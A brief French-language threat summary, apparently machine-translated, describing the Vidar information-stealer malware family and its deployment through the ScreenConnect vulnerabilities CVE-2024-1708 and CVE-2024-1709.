Vidar (VidarStealer) : Un voleur d'informations sur les produits de base qui est dans la nature depuis 2018 et qui s'est développé en une famille de logiciels malveillants lourdement armés. Les attaquants ont pu déployer Vidar en exploitant des vulnérabilités dans le populaire logiciel ScreenConnect RRM de ConnectWise. Ces deux CVE, CVE-2024-1708 et CVE-2024-1709, ont permis aux acteurs de la menace de contourner et d'accéder à des systèmes critiques.